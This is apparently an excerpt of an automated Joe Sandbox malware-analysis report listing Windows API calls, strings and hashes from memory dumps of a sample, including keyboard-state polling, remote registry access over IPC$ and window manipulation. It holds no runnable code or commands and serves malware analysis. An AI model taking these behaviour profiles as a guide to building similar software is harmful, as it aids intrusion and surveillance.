                                                                                                                                                                                                                                                                              • timeGetTime.WINMM ref: 0075EFCB
                                                                                                                                                                                                                                                                                • Part of subcall function 0070F215: timeGetTime.WINMM(?,?,0075EFEB), ref: 0070F219
                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 0075EFF8
                                                                                                                                                                                                                                                                              • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 0075F01C
                                                                                                                                                                                                                                                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0075F03E
                                                                                                                                                                                                                                                                              • SetActiveWindow.USER32 ref: 0075F05D
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0075F06B
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 0075F08A
                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(000000FA), ref: 0075F095
                                                                                                                                                                                                                                                                              • IsWindow.USER32 ref: 0075F0A1
                                                                                                                                                                                                                                                                              • EndDialog.USER32(00000000), ref: 0075F0B2
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                                                              • String ID: BUTTON
                                                                                                                                                                                                                                                                              • API String ID: 1194449130-3405671355
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0075F374
                                                                                                                                                                                                                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0075F38A
                                                                                                                                                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0075F39B
                                                                                                                                                                                                                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0075F3AD
                                                                                                                                                                                                                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0075F3BE
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: SendString$_wcslen
                                                                                                                                                                                                                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                                                              • API String ID: 2420728520-1007645807
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00723007
                                                                                                                                                                                                                                                                                • Part of subcall function 00722D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0072DB51,007C1DC4,00000000,007C1DC4,00000000,?,0072DB78,007C1DC4,00000007,007C1DC4,?,0072DF75,007C1DC4), ref: 00722D4E
                                                                                                                                                                                                                                                                                • Part of subcall function 00722D38: GetLastError.KERNEL32(007C1DC4,?,0072DB51,007C1DC4,00000000,007C1DC4,00000000,?,0072DB78,007C1DC4,00000007,007C1DC4,?,0072DF75,007C1DC4,007C1DC4), ref: 00722D60
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00723013
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0072301E
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00723029
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00723034
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0072303F
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0072304A
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00723055
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00723060
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0072306E
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                              • String ID: &y
                                                                                                                                                                                                                                                                              • API String ID: 776569668-238476832
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 0075A9D9
                                                                                                                                                                                                                                                                              • SetKeyboardState.USER32(?), ref: 0075AA44
                                                                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 0075AA64
                                                                                                                                                                                                                                                                              • GetKeyState.USER32(000000A0), ref: 0075AA7B
                                                                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 0075AAAA
                                                                                                                                                                                                                                                                              • GetKeyState.USER32(000000A1), ref: 0075AABB
                                                                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 0075AAE7
                                                                                                                                                                                                                                                                              • GetKeyState.USER32(00000011), ref: 0075AAF5
                                                                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 0075AB1E
                                                                                                                                                                                                                                                                              • GetKeyState.USER32(00000012), ref: 0075AB2C
                                                                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 0075AB55
                                                                                                                                                                                                                                                                              • GetKeyState.USER32(0000005B), ref: 0075AB63
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 541375521-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00756649
                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00756662
                                                                                                                                                                                                                                                                              • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 007566C0
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 007566D0
                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 007566E2
                                                                                                                                                                                                                                                                              • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00756736
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00756744
                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00756756
                                                                                                                                                                                                                                                                              • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00756798
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 007567AB
                                                                                                                                                                                                                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 007567C1
                                                                                                                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 007567CE
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3096461208-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F2234: GetWindowLongW.USER32(?,000000EB), ref: 006F2242
                                                                                                                                                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 006F2152
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ColorLongWindow
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 259745315-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 007328D1
                                                                                                                                                                                                                                                                              • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 007328EA
                                                                                                                                                                                                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007328FA
                                                                                                                                                                                                                                                                              • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00732912
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00732933
                                                                                                                                                                                                                                                                              • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,006F11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00732942
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0073295F
                                                                                                                                                                                                                                                                              • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,006F11F5,00000000,00000000,00000000,000000FF,00000000), ref: 0073296E
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                                                              • String ID: (|
                                                                                                                                                                                                                                                                              • API String ID: 1268354404-3772712737
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006F24B0
                                                                                                                                                                                                                                                                                • Part of subcall function 006F19CD: GetCursorPos.USER32(?), ref: 006F19E1
                                                                                                                                                                                                                                                                                • Part of subcall function 006F19CD: ScreenToClient.USER32(00000000,?), ref: 006F19FE
                                                                                                                                                                                                                                                                                • Part of subcall function 006F19CD: GetAsyncKeyState.USER32(00000001), ref: 006F1A23
                                                                                                                                                                                                                                                                                • Part of subcall function 006F19CD: GetAsyncKeyState.USER32(00000002), ref: 006F1A3D
                                                                                                                                                                                                                                                                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 007895C7
                                                                                                                                                                                                                                                                              • ImageList_EndDrag.COMCTL32 ref: 007895CD
                                                                                                                                                                                                                                                                              • ReleaseCapture.USER32 ref: 007895D3
                                                                                                                                                                                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 0078966E
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00789681
                                                                                                                                                                                                                                                                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 0078975B
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID$(|$(|
                                                                                                                                                                                                                                                                              • API String ID: 1924731296-2735991863
                                                                                                                                                                                                                                                                              • Opcode ID: 8fd00fc285e00e6d9d6070a6abb725caffbe57c2b5e5018c63c8d22597af6b29
                                                                                                                                                                                                                                                                              • Instruction ID: 91285e6ff8f2b8aecb47a0c2c81c0ae5875a1e8c5f5bbabb6e8827c4d4fa9932
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8fd00fc285e00e6d9d6070a6abb725caffbe57c2b5e5018c63c8d22597af6b29
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B51BC70240304AFD704EF10CC5AFBA77E5FB84710F500A2CFA95962E2DB78A904CB56
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00740D31,00000001,0000138C,00000001,00000000,00000001,?,0076EEAE,007C2430), ref: 0075A091
                                                                                                                                                                                                                                                                              • LoadStringW.USER32(00000000,?,00740D31,00000001), ref: 0075A09A
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00740D31,00000001,0000138C,00000001,00000000,00000001,?,0076EEAE,007C2430,?), ref: 0075A0BC
                                                                                                                                                                                                                                                                              • LoadStringW.USER32(00000000,?,00740D31,00000001), ref: 0075A0BF
                                                                                                                                                                                                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0075A1E0
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                                                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                                              • API String ID: 747408836-2268648507
                                                                                                                                                                                                                                                                              • Opcode ID: 73fe0423d6b252118154b66c78f5485c126a210b2c7ed6deb6b61c9006705e96
                                                                                                                                                                                                                                                                              • Instruction ID: 08ea56ccb0a7a15e3cbbdefb55e0a18493c5f33d925094781394c1efb11e3f9a
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73fe0423d6b252118154b66c78f5485c126a210b2c7ed6deb6b61c9006705e96
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F41407280010DAACB14FBE0DD56EFEB779AF14341F504169F601B2092EB796F49CBA5
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F8577: _wcslen.LIBCMT ref: 006F858A
                                                                                                                                                                                                                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00751093
                                                                                                                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007510AF
                                                                                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007510CB
                                                                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 007510F5
                                                                                                                                                                                                                                                                              • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0075111D
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00751128
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0075112D
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                              • API String ID: 323675364-22481851
                                                                                                                                                                                                                                                                              • Opcode ID: 29310b9a0882c245a3268a1c01178a57515d63b1d1bea32f34902aeaf17408c4
                                                                                                                                                                                                                                                                              • Instruction ID: 1cd0cb6ab78f9f56779f05d4bff312af70f2a0a6c9679372f88d4270e26ab4be
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 29310b9a0882c245a3268a1c01178a57515d63b1d1bea32f34902aeaf17408c4
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC411772C1022DABCF21EBA4DC95DEEB779BF04750F504069EA01A31A0EB759E08CB54
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00784AD9
                                                                                                                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00784AE0
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00784AF3
                                                                                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00784AFB
                                                                                                                                                                                                                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00784B06
                                                                                                                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 00784B10
                                                                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00784B1A
                                                                                                                                                                                                                                                                              • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00784B30
                                                                                                                                                                                                                                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00784B3C
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                                                              • String ID: static
                                                                                                                                                                                                                                                                              • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                                                              • Opcode ID: 45f92aae14868f2a22fc42494e72f5268a6efbf5e0357f5be81a78b37b2add73
                                                                                                                                                                                                                                                                              • Instruction ID: cddfa286ffdb47fc5d568fd49d2b65ade39d2a07a9204c392e24f2788e4afb45
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45f92aae14868f2a22fc42494e72f5268a6efbf5e0357f5be81a78b37b2add73
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83318E72180219BBDF21AFA4CC08FDA3BA9FF09364F114215FA14A61E0C779DC10DB98
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 007746B9
                                                                                                                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 007746E7
                                                                                                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 007746F1
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0077478A
                                                                                                                                                                                                                                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 0077480E
                                                                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 00774932
                                                                                                                                                                                                                                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 0077496B
                                                                                                                                                                                                                                                                              • CoGetObject.OLE32(?,00000000,00790B64,?), ref: 0077498A
                                                                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000), ref: 0077499D
                                                                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00774A21
                                                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00774A35
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 429561992-0
                                                                                                                                                                                                                                                                              • Opcode ID: 2d64658f695398760ebbae21672881d01b68839bbc9efd4683f3aa0e6b15ff30
                                                                                                                                                                                                                                                                              • Instruction ID: 86aaa11a86700a9a038ca37395840c0f0ef24896d5766f9dd68d95af5038690d
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d64658f695398760ebbae21672881d01b68839bbc9efd4683f3aa0e6b15ff30
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EAC146B16043059FCB00DF68C88492BB7E9FF89798F10891DF9899B251DB35ED05CB92
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 00768538
                                                                                                                                                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 007685D4
                                                                                                                                                                                                                                                                              • SHGetDesktopFolder.SHELL32(?), ref: 007685E8
                                                                                                                                                                                                                                                                              • CoCreateInstance.OLE32(00790CD4,00000000,00000001,007B7E8C,?), ref: 00768634
                                                                                                                                                                                                                                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 007686B9
                                                                                                                                                                                                                                                                              • CoTaskMemFree.OLE32(?,?), ref: 00768711
                                                                                                                                                                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0076879C
                                                                                                                                                                                                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 007687BF
